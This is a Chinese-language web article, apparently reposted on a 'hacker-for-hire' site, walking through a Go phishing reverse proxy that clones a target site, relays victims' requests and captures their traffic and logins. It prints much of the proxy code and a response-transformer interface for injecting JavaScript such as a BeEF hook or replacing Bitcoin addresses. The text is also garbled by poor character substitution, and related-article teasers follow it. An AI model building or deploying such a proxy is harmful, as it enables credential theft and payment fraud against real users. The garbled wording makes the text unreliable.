在Go中运用反向署理进行 *** 垂钓测验

访客6年前关于黑客接单1437

关于一个进犯者来说,要想施行一次 *** 垂钓进犯,往往需求做很多的准备作业。例如建立垂钓站点,诱惑受害者上钩,捕获受害者的登录凭据等。为了防止这些冗杂的进程,本文我将教咱们运用Go自动化这些进程。
完好的代码和运用说明能够在Github检查:https://github.com/JonCooperWorks/judas

署理被用来垂钓TechOnRoad用户。你能看出它们之间的不同吗?
运用署理进行 *** 垂钓
咱们的署理需求接纳来自受害者的恳求,并在发送到方针网站之前重写它们。Go有着许多在原生层面临并发编程进行支撑的优异特性,比方Goroutines、Channels等。咱们建立了一个简略的TCP侦听器,spawn了一个新的goroutine来处理每个传入的衔接和一个goroutine worker来处理恳求和呼应。成果经过channel从恳求处理goroutine传递给worker。
// HTTPTransaction represents a complete request - response flow.
type HTTPTransaction struct {
  Request  *http.Request
  Response *http.Response
}
// PhishingProxy proxies requests between the victim and the target, queuing requests and responses for further processing.
type PhishingProxy struct {
  client               *http.Client
  targetURL            *url.URL
  responseTransformers []ResponseTransformer
}
func main() {
        // ... flag parsing and whatnot
        phishingProxy := &PhishingProxy{
    client:               client,
    targetURL:            u,
    responseTransformers: responseTransformers,
  }
  transactions := make(chan *HTTPTransaction)
  go processTransactions(transactions)
  for {
    conn, err := server.Accept()
    if err != nil {
      log.Println("Error when accepting request,", err.Error())
    }
    go phishingProxy.HandleConnection(conn, transactions)
  }
}
因为Go的优异规范库,恳求处理十分简练。http包供给ReadRequest办法,用于解析从衔接中读取数据的恳求。
defer conn.Close()
reader := bufio.NewReader(conn)
request, err := http.ReadRequest(reader)
if err != nil {
  log.Println("Error parsing request:", err.Error())
  return
}
将一切内容解析成Golang http.Request后,咱们将它传递给方针。署理需求重写来自受害者的HTTP头,以防止方针站点衔接中止,特别是主机头和URL。
request.URL.Scheme = p.targetURL.Scheme
request.URL.Host = p.targetURL.Host
request.Host = p.targetURL.Host
request.RequestURI = ""
resp, err := p.client.Do(request)
if err != nil {
  log.Println("Proxy error:", err.Error())
  return
}
在署理上运用HTTP客户端,咱们建议恳求并保证恳求成功。
一旦咱们得到呼应,咱们运用传递给署理的ResponseTransformers(后面会具体介绍)转化它,运用规范库httputil.DumpResponse函数将呼应转化为字节,并将恳求和呼应发送给goroutine worker之后处理。
for _, transformer := range p.responseTransformers {
  transformer.Transform(resp)
}
modifiedResponse, err := httputil.DumpResponse(resp, true)
if err != nil {
  log.Println("Error converting requests to bytes:", err.Error())
  return
}
_, err = conn.Write(modifiedResponse)
if err != nil {
  log.Println("Error responding to victim:", err.Error())
  return
}
transactions
咱们经过一个channel将HTTP业务传递给worker,以加速咱们的操作进程防止受害者发作某些过错。
只需指向该署理,就能完美克隆方针网站。
// ResponseTransformer modifies a response in any way we see fit, such as inserting extra JavaScript.
type ResponseTransformer interface {
  Transform(response *http.Response) error
}
ResponseTransformer答应你修正呼应。咱们能够用它来任何想做的作业,例如将自界说JavaScript注入到页面,或许将比特币地址替换成咱们自己的。这关于那些在默许署理中无法100%作业的网站也很有用。
JavaScriptInjectionTransformer运用GoQuery将HTML呼应解析到DOM树中,并运用咱们传递给transformer的URL注入脚本标签。咱们能够运用它来注入BeEF hook或绕过网站的安全防护。
// JavaScriptInjectionTransformer holds JavaScript filename for injecting into response.
type JavaScriptInjectionTransformer struct {
  javascriptURL string
}
// Transform Injects JavaScript into an HTML response.
func (j JavaScriptInjectionTransformer) Transform(response *http.Response) error {

[1] [2]  黑客接单网

相关文章

PDO 避免SQL注入的原理

 当说到防止SQL注入的办法时,脑海中总是会想到运用PDO绑定参数的办法或许运用mysql_real_eascape_string()来处理(尽管陈旧的 mysql_XXX 这类的函数现已不主张运用)...

经过Thinkphp结构缝隙所发现的安全问题

在一次偶尔的时机发现公司某个网站存在thinkphp的长途指令履行缝隙,自此对这个缝隙爱不释手。这究竟是为什么呢?首要原因有2点:榜首,假如网站存在这个缝隙,咱们可以去履行各式各样的体系指令来进行测验...

怎么脱节Google的影响,完成一个完全无Google要素的网络环境

本文我得先从我最近参加的一个安全检测项目开端谈起,本次的客户是一家企业,不得不说,本次咱们的客户的安全防护做得非常好。他们的安全运营中心(SOC)装备了许多先进的内部反常检测东西以及坚强的作业呼应团队...

怎么使用神经网络和Python生成指定形式的暗码

今日给咱们介绍的是Github上一个名叫PyMLProjects的项目,这个项意图意图是为了练习AI来学习人类结构暗码的形式,然后咱们就可以用AI来生成许多同一形式或品种的暗码了。这种办法或许可以用...

Web前端安全探秘:技能理论与实际使用

Web前端安满是个新概念,能够理解为它是Web安全防护范畴的一部分。 早些时候,曾被狭义的以为前端安全即JS安全。却是没有错,但不全面。现在来看,应该说:前端代码安全(JS代码安全)+ 前端进犯侵略防...

开发一个基于Dalvik字节码的相似性检测引擎,比较同一款Android应用程序的不同版本之

上文咱们说过,《针对Dalvik字节码的类似性检测引擎,比较同一款Android运用程序的不同版别之间的代码差异》这篇文章计区分两个部分来解说,上文只介绍了怎么运用Quarkslab公司开发的diff...